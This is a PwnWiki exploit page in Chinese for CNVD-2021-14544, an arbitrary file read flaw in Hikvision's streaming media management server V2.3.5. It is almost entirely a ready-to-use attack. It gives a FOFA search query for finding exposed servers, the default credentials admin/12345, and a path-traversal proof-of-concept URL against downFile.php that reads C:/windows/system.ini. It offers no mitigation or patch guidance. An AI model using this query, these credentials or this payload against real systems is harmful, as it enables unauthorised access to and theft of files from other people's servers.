CNVD-2021-14544 HIKVISION 流媒体管理服务器后台任意文件读取漏洞

From PwnWiki

Revision as of 17:41, 12 June 2021 by Atsud0 (talk | contribs) (Created page with "==参考==")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（简体）‎ • ‎中文（繁體）‎

漏洞影响

杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5

FOFA

FOFA：title="流媒体管理服务器"

默认登陆信息

admin/12345

POC

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

成功读取 C:/windows/system.ini

参考

https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-14544_HIKVISION_流媒體管理服務器_後台任意文件讀取漏洞/zh-hans&oldid=4883"